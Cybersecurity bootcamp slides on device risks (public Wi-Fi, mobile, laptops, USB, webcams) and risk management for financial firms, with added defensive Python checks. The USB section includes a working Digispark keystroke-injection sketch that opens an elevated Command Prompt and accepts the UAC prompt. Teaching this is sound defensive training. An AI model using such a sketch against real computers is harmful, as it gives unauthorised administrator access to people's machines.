
Cybersecurity Bootcamp | Module 4

Risk Management: Perimeter of Exposure
Class Pointers

● Please switch on your webcams! Communication is 70% body language.


● This is not a webinar. This is an interactive, hands-on training workshop,
where everyone participates!
● Keep your mic constantly muted (to prevent background noise)
● Unmute your mic to speak up and ask questions
● Always clarify your doubts. Don’t be shy!
● Feel free to ask any questions. This is a safe zone for everyone, no matter
your starting level.

© 2022 Vertical Institute


Vertical Institute
Class Pointers
● Use the ‘Raise Hand’ or ‘Thumbs Up’ function!




Agenda
Tutorial
• Security risks and recommendations
  • Wireless
  • Mobile
  • Laptop
  • USB device
  • Web cameras
• Risk management
  • Importance of Cybersecurity Risk Assessment
  • Risk identification
  • Risk analysis
  • Risk evaluation
  • Vendors’ risk management
  • Service providers’ risk management
  • Insider threats’ risk management



Agenda
Activity
• Check for shared folders in computer
• Check for mobile application permission settings
• Update computers and mobile devices
• Enable antivirus and firewall on computers
• Determine cyber risks and responses for an organization



Cybersecurity risks examples to
financial services organizations
What are risks?

“Risk management is the identification, evaluation, and prioritisation of risks followed by coordinated and economical application of resources to minimise, monitor, and control the probability or impact of unfortunate events or to maximise the realisation of opportunities.”



Real life risks
• Is crossing the road risky?
• Is drinking the water risky?
• Is doing activity A risky?



What are Cybersecurity Risks?

● Identification of disruptions that may negatively impact an organisation’s IT assets
● What can disrupt Confidentiality, Integrity and Availability?



Remember we learned about CIA?
Cybersecurity Risk Examples to financial services organisations

● Confidentiality of information
○ Only you can access your bank account statements
● Integrity of information
○ Bank account statement not changed without your approval
● Availability of services
○ Able to access the banking services without disruption



Security risks and recommendations relating to financial services

Is joining free WiFis safe?
● Safe
● Not safe



Wireless Security
● Securing the use of wireless connections



Wireless Access Points
• WiFi is another form of wireless connection to the internet.
• Like any connection to the internet, it carries its own threats.



Wireless Risks
Risks include:
• Insecure WiFi connections and Public WiFi
• Accessing fake access points
• Using default or weak Wireless Access Points’ passwords



Is public Wi-Fi safe?

https://www.tnp.sg/news/singapore/think-your-phone-safe-public-wi-fi-think-again



Wireless Hacking
The most dangerous type of WiFi networks

An unsecured WiFi connection is a network that doesn’t require a password and doesn’t protect the traffic inside it. Most of the time these connections are provided as a service for customers, as in an airport terminal, cafes or malls.

Although many of these networks have been upgraded and now require a password and support protection, there are still those that remain unsecured.

A shared password only partly fixes this: on a WPA2-Personal network everyone who knows the password can, after capturing a client’s connection handshake, decrypt that client’s traffic. The protection you control yourself is end-to-end encryption (HTTPS or a VPN), whichever network you are on.



Evil Twin
Fake Wireless Access Points



You can create fake WiFis too



What happens if you change your mobile hotspot name to the following?
● Free Starbucks WiFi
● Wireless@SGX
● Free shopping mall WiFi
● Any other WiFis in the vicinity that you can copy
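The check a practitioner runs before joining a network with a familiar name, as an added example that is not part of the course material: an evil twin usually shows up as the same SSID advertised by access points from a different hardware vendor (the first three bytes of the BSSID) or with a different security setting than the legitimate ones. The scan lines are constructed; the live path assumes Linux with NetworkManager and the terse output of `nmcli -t -f SSID,BSSID,SECURITY,SIGNAL dev wifi`, in which colons inside a field are escaped as `\:` (an assumption about nmcli’s format).

```python
"""Evil-twin check over a Wi-Fi scan: an SSID broadcast by access points from
more than one hardware vendor, or with inconsistent security settings,
deserves a second look before you join it.  SCAN is constructed; live_scan()
assumes `nmcli -t` output where ':' inside a field is escaped as '\\:'."""
from collections import defaultdict
import subprocess

# Constructed scan, nmcli -t style: SSID:BSSID:SECURITY:SIGNAL (empty SECURITY = open)
SCAN = r"""
Wireless@SGX:3C\:37\:86\:10\:AA\:01:WPA2 802.1X:78
Wireless@SGX:3C\:37\:86\:10\:AA\:02:WPA2 802.1X:64
Wireless@SGX:A4\:5E\:60\:11\:22\:33::90
Free Starbucks WiFi:00\:1D\:7E\:44\:55\:66::55
CafeGuest:F4\:F2\:6D\:77\:88\:99:WPA2:60
CafeGuest:F4\:F2\:6D\:77\:88\:9A:WPA2:58
""".strip().splitlines()


def split_terse(line):
    """Split on unescaped ':' and unescape '\\:' within fields."""
    fields, cur, i = [], "", 0
    while i < len(line):
        ch = line[i]
        if ch == "\\" and i + 1 < len(line):
            cur += line[i + 1]
            i += 2
            continue
        if ch == ":":
            fields.append(cur)
            cur = ""
        else:
            cur += ch
        i += 1
    fields.append(cur)
    return fields


def parse_scan(lines):
    nets = []
    for line in lines:
        ssid, bssid, security, signal = split_terse(line)
        bssid = bssid.upper()
        nets.append({"ssid": ssid, "bssid": bssid, "oui": bssid[:8],
                     "security": security or "OPEN", "signal": int(signal)})
    return nets


def find_evil_twins(nets):
    """Return {ssid: [reasons]} for SSIDs whose access points disagree with each other."""
    by_ssid = defaultdict(list)
    for n in nets:
        by_ssid[n["ssid"]].append(n)
    findings = {}
    for ssid, aps in by_ssid.items():
        reasons = []
        securities = {a["security"] for a in aps}
        ouis = {a["oui"] for a in aps}
        if len(securities) > 1:
            reasons.append("mixed security: " + ", ".join(sorted(securities)))
        if len(ouis) > 1:
            reasons.append("access points from different vendors: " + ", ".join(sorted(ouis)))
        if reasons:
            findings[ssid] = reasons
    return findings


def live_scan():
    """Run nmcli if present; fall back to the constructed sample otherwise."""
    try:
        out = subprocess.run(["nmcli", "-t", "-f", "SSID,BSSID,SECURITY,SIGNAL", "dev", "wifi"],
                             capture_output=True, text=True, check=True).stdout
        return [l for l in out.splitlines() if l]
    except (FileNotFoundError, subprocess.CalledProcessError):
        return SCAN


if __name__ == "__main__":
    for ssid, reasons in find_evil_twins(parse_scan(live_scan())).items():
        print(f"suspicious SSID {ssid!r}: " + "; ".join(reasons))
```

In the sample the open, strongest "Wireless@SGX" access point from a different vendor is the hotspot the slide describes. A venue may legitimately mix vendors, so treat a hit as a prompt to ask staff which network is theirs, not as proof.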



Your devices with wireless access



Man in the middle attack
● An attacker who controls the access point sits between you and every website you visit and can read or modify any traffic that is not end-to-end encrypted
● Usernames, passwords, credit card information, etc. sent over plain HTTP are exposed in full
● HTTPS hides the page contents, but the attacker still sees which hosts you connect to and can try to redirect you to a look-alike login page



Remember the Computer Misuse Act?
Interception of traffic falls under the Computer Misuse Act



Shared folders

A folder shared with “Everyone” is accessible by anyone on the same network, including strangers on a public Wi-Fi



Exercise 1: Check your shared files and folders
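The same check from the command line, as an added example that is not part of the course material: it parses the output of Windows’ `net share` and reports every share that is not one of the default administrative shares, since those are what another machine on the same network can reach. The sample output is constructed in the `net share` layout, and the live path only runs on Windows.

```python
"""Lists the file shares a Windows machine exposes and flags those that are
not default administrative shares.  SAMPLE_NET_SHARE is constructed in the
layout `net share` prints; live_shares() runs the real command on Windows."""
import platform
import re
import subprocess

SAMPLE_NET_SHARE = """
Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\\Windows                      Remote Admin
Finance      C:\\Users\\me\\Documents\\Finance
Public       C:\\Users\\Public                 Everyone can read
The command completed successfully.
"""

DRIVE_PATH = re.compile(r"^[A-Za-z]:")


def parse_net_share(text):
    """Turn the fixed-width table into dicts; columns are separated by two or more spaces."""
    shares, in_table = [], False
    for line in text.splitlines():
        if line.startswith("-----"):
            in_table = True
            continue
        if not in_table or not line.strip() or line.startswith("The command"):
            continue
        cols = re.split(r"\s{2,}", line.strip())
        name, resource, remark = cols[0], "", ""
        rest = cols[1:]
        if rest and DRIVE_PATH.match(rest[0]):       # IPC$ has no resource, only a remark
            resource, rest = rest[0], rest[1:]
        if rest:
            remark = rest[0]
        shares.append({"name": name, "resource": resource, "remark": remark})
    return shares


def is_default_admin_share(name):
    """C$, D$, ADMIN$ and IPC$ are created by Windows and require administrator rights."""
    return name in {"ADMIN$", "IPC$"} or re.fullmatch(r"[A-Za-z]\$", name) is not None


def exposed_shares(shares):
    """Everything else, hidden ($-suffixed) or not, was created by a user and is reachable over the network."""
    return [s for s in shares if not is_default_admin_share(s["name"])]


def live_shares():
    """Run `net share` on Windows; returns None elsewhere so callers can fall back to the sample."""
    if platform.system() != "Windows":
        return None
    out = subprocess.run(["net", "share"], capture_output=True, text=True, check=True).stdout
    return parse_net_share(out)


if __name__ == "__main__":
    shares = live_shares() or parse_net_share(SAMPLE_NET_SHARE)
    for s in exposed_shares(shares):
        print(f"exposed share {s['name']} -> {s['resource'] or '?'} ({s['remark'] or 'no remark'})")
```

A share that the script lists is one to remove, or at least restrict to named users, before connecting to a network you do not control.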



Exercise 2: Check file and printer sharing when connecting publicly, and disable it if it is on

On Windows this is under Settings > Network & internet > Advanced network settings > Advanced sharing settings: under “Public networks”, switch off network discovery and file and printer sharing.


Change Your Wireless Access Password



Mobile Devices
● Always keep track of your phone
● Screen lock
● Enable remote wiping
● Always update
● Choose mobile apps from trusted sources
● Do not jailbreak or root devices
● Disable WiFi/Bluetooth when not in use



Mobile devices are minicomputers

● Their flash storage can be read directly from a computer if the chip is removed or the phone is booted into a recovery or download mode, bypassing the lock screen entirely
● Modern phones encrypt that storage by default, but the protection is tied to the screen lock: a device with no PIN or passcode is effectively unencrypted, and older or custom-ROM devices may not encrypt at all



Remote wiping



• Disable Wi-Fi when not in use
• Disable Bluetooth when not in use


• Phones can be attacked through the USB port when plugged into an untrusted computer or charger


Ransomware on mobile devices
• Never click on unverified links
• Do not open untrusted email attachments
• Only download from sites you trust
• Avoid giving out personal data
• Never use unfamiliar USBs
• Backup your data



Exercise: Update your mobile devices



Mobile App Permissions
▪ Body Sensors
▪ Calendar
▪ Camera
▪ Contacts
▪ Location
▪ Microphone
▪ Phone
▪ SMS
▪ Storage



Check Mobile App Permissions

Android:
Head to the Apps & notifications menu in Settings and find the Permissions option. If this isn’t displayed on the main menu, it might be tucked away in the hamburger icon in the top right. From here, you can browse through all the available permissions on your phone, as well as a quick overview of how many apps have been granted each permission. On newer Android versions the same screen is under Settings > Privacy > Permission manager.



Check Mobile App Permissions

iPhone:
• Head to Settings > Privacy & Security (called Privacy on older iOS versions). Each category, such as Location Services, Contacts, Camera or Microphone, lists the apps that have asked for it and lets you switch each one off. To see everything a single app has been granted, scroll down the main Settings list and tap that app’s name.

https://www.digitaltrends.com/mobile/how-to-control-ios-app-permissions/
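The same review for an Android app from a computer, as an added example that is not part of the course material: it reads `adb shell dumpsys package <pkg>`, keeps only the dangerous (runtime) permissions that are actually granted, compares them with what the app needs for its stated purpose, and prints the `adb shell pm revoke` commands for the rest. The dumpsys sample is constructed (the `<permission>: granted=true|false` line format is an assumption about dumpsys output), and the EXPECTED table of what each app legitimately needs is an assumption for the example.

```python
"""Finds dangerous Android permissions an app holds but has no stated need
for, and emits the adb commands to revoke them.  SAMPLE_DUMPSYS and EXPECTED
are constructed for the example; dumpsys() is the live path."""
import re
import subprocess

# Runtime ("dangerous") permissions grouped the way the Settings screen shows them.
GROUPS = {
    "android.permission.BODY_SENSORS": "Body Sensors",
    "android.permission.READ_CALENDAR": "Calendar",
    "android.permission.WRITE_CALENDAR": "Calendar",
    "android.permission.CAMERA": "Camera",
    "android.permission.READ_CONTACTS": "Contacts",
    "android.permission.WRITE_CONTACTS": "Contacts",
    "android.permission.ACCESS_FINE_LOCATION": "Location",
    "android.permission.ACCESS_COARSE_LOCATION": "Location",
    "android.permission.RECORD_AUDIO": "Microphone",
    "android.permission.READ_PHONE_STATE": "Phone",
    "android.permission.CALL_PHONE": "Phone",
    "android.permission.READ_SMS": "SMS",
    "android.permission.SEND_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.READ_EXTERNAL_STORAGE": "Storage",
    "android.permission.WRITE_EXTERNAL_STORAGE": "Storage",
}

# What each app needs for its stated purpose (assumption for the example).
EXPECTED = {
    "com.example.calculator": set(),
    "com.example.bank": {"Camera", "Location"},   # cheque capture, branch locator
}

PERM_RE = re.compile(r"^\s*(android\.permission\.[A-Z_]+): granted=(true|false)")

# Constructed excerpt in the shape of `adb shell dumpsys package com.example.calculator`
SAMPLE_DUMPSYS = """
Packages:
  Package [com.example.calculator] (1a2b3c):
    userId=10123
    install permissions:
      android.permission.INTERNET: granted=true
    User 0: installed=true
      runtime permissions:
        android.permission.READ_SMS: granted=true, flags=[ USER_SET|USER_SENSITIVE_WHEN_GRANTED]
        android.permission.ACCESS_FINE_LOCATION: granted=true, flags=[ USER_SET]
        android.permission.CAMERA: granted=false, flags=[ USER_SET]
"""


def granted_dangerous(dumpsys_text):
    """Map each granted dangerous permission to its group; INTERNET and other install-time permissions are ignored."""
    granted = {}
    for line in dumpsys_text.splitlines():
        m = PERM_RE.match(line)
        if m and m.group(2) == "true" and m.group(1) in GROUPS:
            granted[m.group(1)] = GROUPS[m.group(1)]
    return granted


def excess_permissions(package, dumpsys_text):
    """Granted permissions whose group the app has no stated need for."""
    allowed = EXPECTED.get(package, set())
    return sorted(p for p, g in granted_dangerous(dumpsys_text).items() if g not in allowed)


def revoke_commands(package, dumpsys_text):
    return [f"adb shell pm revoke {package} {p}" for p in excess_permissions(package, dumpsys_text)]


def dumpsys(package):
    """Live path: needs adb on the PATH and a connected device with USB debugging enabled."""
    return subprocess.run(["adb", "shell", "dumpsys", "package", package],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for cmd in revoke_commands("com.example.calculator", SAMPLE_DUMPSYS):
        print(cmd)
```

A calculator holding SMS and precise location is exactly the pattern the slide warns about; the app keeps working after the revoke, and if it does not, that is worth knowing too.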



Mobile Hacking Demo

Mobile Devices: Work Profile
Separate work apps and data from personal apps and data



Mobile Devices Security for Financial Services Organisations

● Financial services companies should make it compulsory for employees to use work profiles, so that a compromised personal side of the device cannot reach work data
  ○ For example, if an employee installs a rogue application, that application should not have the permissions to access work data
● Financial services companies should ensure that the mobile banking app their customers download refuses to run on rooted or jailbroken devices
  ○ Rooted devices give an attacker, and any malware, deeper access to the phone than is otherwise possible, including the banking app’s own storage
  ○ Root detection can be bypassed by a determined attacker, so treat it as one layer alongside server-side fraud checks rather than the only control



Laptop
● Always keep track of your laptop
● Screen lock
● Always update
● Download only from trusted sources
● Disable WiFi/Bluetooth when not in use



Laptops can be accessed without username and password

● A laptop’s hard drive can be taken out and plugged into a separate computer, which reads the files without ever seeing the login screen
● Full-disk encryption (BitLocker on Windows, FileVault on macOS) is the control that defeats this; check that it is turned on
● Use your laptop vendor’s locate-and-lock service (for example Find My on macOS) so a lost device can be located or wiped



Exercise: Update all your computers

Exercise: Enable Windows Defender

Exercise: Enable the macOS firewall


Device Security for Financial Services Organisations

● Anti-virus to be provided by the company for employees accessing corporate data from their personal mobile devices
● Customers’ devices should be checked for their security configuration (screen lock, OS version, root or jailbreak status) before access to the mobile app is granted



Universal Serial Bus (USB)



How does USB hacking work?

The sketch below is for a Digispark-style board using the DigiKeyboard library. The board enumerates as a keyboard, so the computer trusts it and it types the attack for the attacker:

#include "DigiKeyboard.h"

void setup()
{
  // leave it empty
}

void loop()
{
  DigiKeyboard.delay(5000); // wait for the host to enumerate the device; time is measured in milliseconds
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT); // press the Windows key to open the Start menu
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("cmd"); // type into Start search to find Command Prompt
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT); // Ctrl+Shift+Enter runs it as administrator
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // move focus to "Yes" on the UAC prompt
  DigiKeyboard.sendKeyStroke(KEY_ENTER);      // accept it
  for(;;) { } // stop executing the loop so the payload runs only once
}

The payload works because the host accepts any device that claims to be a keyboard and because the screen was unlocked; locking the screen whenever you step away and blocking unknown USB devices by policy are the practical defences.



Juice Jacking

https://www.nbcnews.com/tech/security/juice-jacking-why-you-should-avoid-public-phone-charging-stations-n1132046



USB Security Practices
● Enable encryption on USB
● Set a password on sensitive files in USB
● Do not plug unknown USB devices into your computers
● Do not charge or plug your mobile devices into unknown sources



USB Security for Financial Services Organisations

● Use only company-issued USB devices for work
● Company-issued USB devices are typically hardware-encrypted and require a password before the contents can be read, so a lost drive does not become a data breach



Web cameras



Update web cameras



Set web camera password



Live Hacking Demo: How hackers hunt for web cameras

Other devices?
• Smart TV
• Smart home assistants
• Smart fridge
• Smart home
• Smart lock



Exploit-db
● Hosts the Google Hacking Database (GHDB): search keywords (“dorks”) that locate Internet-connected devices and exposed pages through ordinary search engines
● Web cameras, smart TVs, etc. and even mobile devices



Shodan
● Search engine for the Internet of Things: it scans the Internet and indexes the service banners devices return, so anyone can search for exposed cameras, printers and similar devices by product or location



Update network printers



Working from home

• Home devices generally have a lower security posture than corporate-issued devices
• Corporate-issued devices used at home share the network with those home devices, so a compromised smart TV or router can attempt connections to the work laptop; keep the firewall on and do not enable sharing on the home network



Risk Management

• Importance of Cybersecurity Risk Assessment
• Risk identification
• Risk analysis
• Risk evaluation
• Vendors’ risk management
• Service providers’ risk management
• Insider threats’ risk management



Importance of Cybersecurity Risk Assessment

• Threats are listed
• Assets are listed
• Vulnerabilities are listed
• The most critical threats against the most important resources are handled first



Risk identification

● Identifying your assets
  ○ What data do you hold?
  ○ What systems do you run?
  ○ What will happen if these assets go down?
● Identifying threats to assets
  ○ What are the threats to a bank’s website?
● Identifying vulnerabilities of assets
  ○ What are the vulnerabilities of a bank’s website?



Remember Confidentiality, Integrity and Availability?
Risk identification examples for financial services organisations
● You hold credit card numbers and personally identifiable information of customers: what will happen if these data are exposed? (Confidentiality)
● You need to comply with regulatory requirements to have your systems up and running at all times: what will happen if your banking systems are disrupted? (Availability)
● You hold account balance information: what will happen if a hacker gains access to your system and changes the amounts? (Integrity)



Identifying threats

Threat modelling
• Identify Assets
• Create an Architecture Overview
• Decompose the Application
• Identify the Threats
• Document the Threats
• Rate the Threats

STRIDE Model
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege



Identifying vulnerabilities

● Weaknesses in your overall environment that can be taken advantage of by a bad actor
● For example:
  ○ Weak passwords used by a newly launched website
  ○ Misconfiguration of a system that did not go through the review process
  ○ A document scanner that incorrectly reads an e-mail address from a paper form, so the scan goes to the wrong recipient



Risk analysis

Define the impact to the organisation: now that we have identified our assets and the possible threats, we need to estimate the likely impact if these threats go through, and how likely each one is.



Risk evaluation (risk score = probability × impact)

Probability \ Impact     Catastrophic: 5   Major: 4   Moderate: 3   Minor: 2   Negligible: 1
Frequent: 5              25                20         15            10         5
Occasional: 4            20                16         12            8          4
Remote: 3                15                12         9             6          3
Improbable: 2            10                8          6             4          2
Highly improbable: 1     5                 4          3             2          1



How to manage these risks?

• Avoid the risk: do not take the risk
• Share the risk: share the risk with other team members, organisations, etc.
• Accept the risk: go ahead with the project knowing of the risk and its cost
• Control the risk: reduce its impact
  • Preventative actions
  • Detective actions
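The threat identification, risk evaluation and risk treatment steps above carried through for a bank’s website, as an added example that is not part of the course material: each threat is tagged with its STRIDE category, scored with the 5×5 probability-by-impact matrix, and mapped to one of the four responses. The threats, their ratings, the rating thresholds and the treatment rule are all constructed for the example, not a real bank’s assessment or a standard mapping.

```python
"""Risk register for a bank's public website: STRIDE-tagged threats scored
with the 5x5 matrix and mapped to avoid / control / share / accept.
Ratings, thresholds and the treatment rule are assumptions for the example."""
from dataclasses import dataclass

PROBABILITY = {"highly improbable": 1, "improbable": 2, "remote": 3,
               "occasional": 4, "frequent": 5}
IMPACT = {"negligible": 1, "minor": 2, "moderate": 3, "major": 4,
          "catastrophic": 5}


@dataclass
class Risk:
    asset: str
    threat: str
    stride: str        # Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege
    probability: str   # a key of PROBABILITY
    impact: str        # a key of IMPACT

    def score(self) -> int:
        """Cell of the matrix on the slide: probability x impact, 1..25."""
        return PROBABILITY[self.probability] * IMPACT[self.impact]


def rating(score: int) -> str:
    """Thresholds are an assumption; organisations set their own risk appetite."""
    if score >= 15:
        return "high"
    if score >= 8:
        return "medium"
    return "low"


def treatment(risk: Risk) -> str:
    """Map a score to one of the four responses on the slide (rule is an assumption)."""
    score = risk.score()
    if score == 25:
        return "avoid"        # frequent and catastrophic: do not take the risk at all
    return {"high": "control",    # preventative + detective actions
            "medium": "share",    # e.g. insurance, vendor SLA, shared monitoring
            "low": "accept"}[rating(score)]


def prioritise(risks):
    """Most critical first: list of (score, rating, treatment, risk)."""
    rows = [(r.score(), rating(r.score()), treatment(r), r) for r in risks]
    return sorted(rows, key=lambda row: row[0], reverse=True)


# Constructed register for a bank's website.
SAMPLE_REGISTER = [
    Risk("online banking portal", "credential stuffing with leaked passwords", "Spoofing", "frequent", "major"),
    Risk("online banking portal", "volumetric DDoS during salary week", "Denial of Service", "occasional", "major"),
    Risk("customer database", "SQL injection dumps card numbers", "Information Disclosure", "remote", "catastrophic"),
    Risk("transaction ledger", "insider alters account balances", "Tampering", "improbable", "catastrophic"),
    Risk("marketing site", "defacement of static pages", "Tampering", "remote", "minor"),
    Risk("new feature", "unauthenticated balance lookup by account number", "Information Disclosure", "frequent", "catastrophic"),
]

if __name__ == "__main__":
    for score, rate, treat, r in prioritise(SAMPLE_REGISTER):
        print(f"{score:>2} {rate:<6} {treat:<8} [{r.stride}] {r.asset}: {r.threat}")
```

The output is the ordered list the slide describes: the proposed unauthenticated lookup is avoided (not built), credential stuffing and DDoS get controls such as rate limiting, MFA and monitoring, the insider scenario is shared through audit and dual control, and the low-scoring defacement is accepted and revisited at the next review.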



Vendors’ risk management

Vendor inventory
• Who are my vendors?
• Vendor profiling

Service level agreement
• What if my vendor’s systems are down? Do we have a mapping between the SLAs with the vendor and the SLAs I have with my customers?

Ongoing assessments
• Audits, certifications and attestations



Service providers’ risk management

#   Question                                                          Response   Remarks   Ratings
1   Do you have an incident response management team in place?
2   Do you have secure code scanning in place?
3   Do you regularly update the anti-virus in your systems?
4   Are procedures in place to protect against zero-day exploits?



Insider threats’ risk management
• How would a user turn rogue?
• If a user turns rogue, how are you going to track his/her behaviour and actions against the systems?
• Do you have procedures in place to cut off a user’s access to the system if unauthorised attempts are detected?
• Do you have alarms in place to notify the security team of a change in behaviour?



Insider threats’ risk management

● User Behaviour Analytics software


○ Tracks users’ activity across systems
■ Browser type, geo-location, mobile device type, screen resolution, typing
speed and more
● Logging
○ Analytics are based on logs available
● Integrated with access management systems
○ To block users upon detection of rogue activities
  ○ To challenge users with multi-factor authentication in the event that credentials are stolen and used by bad actors
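The detection logic behind those three bullets, as an added example that is not part of the course material: a per-user baseline is built from past login logs (country, device, browser, typing speed), each new login is scored by how many attributes deviate, and the score drives the access-management hook (allow, step-up to MFA, or block). The log lines, the 30% typing-speed tolerance and the score thresholds are all constructed for the example.

```python
"""User behaviour analytics over constructed login logs: build a baseline per
user, score new logins by deviation, and decide allow / challenge / block.
HISTORY, NEW_LOGINS and the thresholds are assumptions for the example."""
from collections import defaultdict

# Constructed log lines: timestamp user country device browser typing_chars_per_minute
HISTORY = """
2024-03-01T09:02:11Z alice SG android chrome 210
2024-03-02T09:05:40Z alice SG android chrome 205
2024-03-03T08:58:03Z alice SG windows chrome 215
2024-03-04T09:01:27Z alice SG android chrome 208
2024-03-01T10:12:00Z bob SG macos safari 160
2024-03-02T10:15:31Z bob SG macos safari 158
2024-03-03T10:09:44Z bob MY macos safari 162
""".strip().splitlines()

NEW_LOGINS = [
    "2024-03-05T09:00:12Z alice SG android chrome 212",   # looks like alice
    "2024-03-05T03:14:55Z alice RU linux firefox 95",     # everything differs: stolen credentials?
    "2024-03-05T10:11:02Z bob MY macos safari 161",       # MY is already in bob's baseline
    "2024-03-05T11:30:00Z bob SG windows safari 159",     # one new attribute
]


def parse(line):
    ts, user, country, device, browser, cpm = line.split()
    return {"ts": ts, "user": user, "country": country, "device": device,
            "browser": browser, "cpm": int(cpm)}


def build_baseline(lines):
    """Per user: the sets of seen countries/devices/browsers and the mean typing speed."""
    seen = defaultdict(lambda: {"country": set(), "device": set(), "browser": set(), "cpm": []})
    for ev in map(parse, lines):
        b = seen[ev["user"]]
        for k in ("country", "device", "browser"):
            b[k].add(ev[k])
        b["cpm"].append(ev["cpm"])
    return {u: {**b, "cpm": sum(b["cpm"]) / len(b["cpm"])} for u, b in seen.items()}


def score_login(baseline, ev):
    """Count deviations from the user's baseline; an unknown user gets the maximum score."""
    b = baseline.get(ev["user"])
    if b is None:
        return 4, ["no baseline for user"]
    reasons = []
    for k in ("country", "device", "browser"):
        if ev[k] not in b[k]:
            reasons.append(f"new {k}: {ev[k]}")
    if abs(ev["cpm"] - b["cpm"]) > 0.3 * b["cpm"]:   # more than 30% off the usual typing speed
        reasons.append(f"typing speed {ev['cpm']} vs baseline {b['cpm']:.0f}")
    return len(reasons), reasons


def decide(score):
    """Hook for the access-management integration (thresholds are assumptions)."""
    if score >= 3:
        return "block"        # revoke the session and alert the security team
    if score >= 1:
        return "challenge"    # step-up with multi-factor authentication
    return "allow"


def evaluate(lines, baseline=None):
    baseline = baseline or build_baseline(HISTORY)
    results = []
    for ev in map(parse, lines):
        score, reasons = score_login(baseline, ev)
        results.append((ev["user"], decide(score), reasons))
    return results


if __name__ == "__main__":
    for user, action, reasons in evaluate(NEW_LOGINS):
        print(f"{user:<6} {action:<9} {'; '.join(reasons) or 'matches baseline'}")
```

The baseline is only as good as the logs feeding it, which is the point of the logging bullet above: attributes that are never recorded can never be scored.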



Cybersecurity Policies

● Formalised in writing so that employees can refer to them
● Password policies
● Confidentiality of information
● Use only corporate USB drives
● Not sharing computers with other employees



Acceptable Use Policy Example
https://www.amerisbank.com/AmerisBank/media/Documents/Acceptable-Use-Policy.pdf



Cybersecurity Procedures

Sequence of activities to perform a security task, for example:
• Hiring: background checks on education, criminal records, referees, etc.
• Identity card: issued only upon approval by security
• Disposal of computers: shredding hard disk drives



People, Process and Technology framework

People
• Are my users aware of the latest threats?
• Are my customers aware of phishing attacks?

Process
• Are processes in place to safeguard data?
• Is there room for improvement in my processes?

Technology
• Am I equipped with the right technology to differentiate a user from a hacker?



Guidelines on Risk Management Practices – Internal Controls

https://www.mas.gov.sg/-/media/MAS/Regulations-and-Financial-Stability/Regulatory-and-Supervisory-Framework/Risk-Management/Internal-Control.pdf



Guidelines on Risk Management Practices – Internal Controls

● Control Environment
● Business Process Controls
● Checklist of Sound Practices to Adopt (page 22 to 28)



Can cybersecurity technology help in Internal Controls? Fraud monitoring

https://www.semanticscholar.org/paper/Credit-Card-Fraud-Detection-Using-Hidden-Markov-Srivastava-Kundu/841b8acad944c4cd0078fb9bac7ec3be85b607
figure/3



What have we learned today?
Tutorial
• Security risks and recommendations
  • Wireless
  • Mobile
  • Laptop
  • USB device
  • Web cameras
• Risk management
  • Importance of Cybersecurity Risk Assessment
  • Risk identification
  • Risk analysis
  • Risk evaluation
  • Vendors’ risk management
  • Service providers’ risk management
  • Insider threats’ risk management



What have we learned today?
Activity
• Check for shared folders in computer
• Check for mobile application permission settings
• Update computers and mobile devices
• Enable antivirus and firewall on computers
• Determine cyber risks and responses for an organization



What is an evil twin wireless attack?
A. Fake wireless access point copying the correct wireless access point
B. Fake computer that looks like the same computer
C. Fake mobile device that looks like the same computer





I need to update my computers, mobile
devices and internet connected devices
regularly
A. True
B. False





Connecting to free Wi-Fi is safe
A. True, because I can surf the internet freely
B. False, because hackers connected to the Wi-Fi
could be trying to get our information.





It is fine to take free USB sticks that come with e-commerce purchases and plug them into my computer

A. True
B. False





Shared folders may be accessible by
hackers through public Wi-Fi
A. True
B. False





Should I plug my mobile phone into free charging stations?
A. Yes
B. No





Thank You!
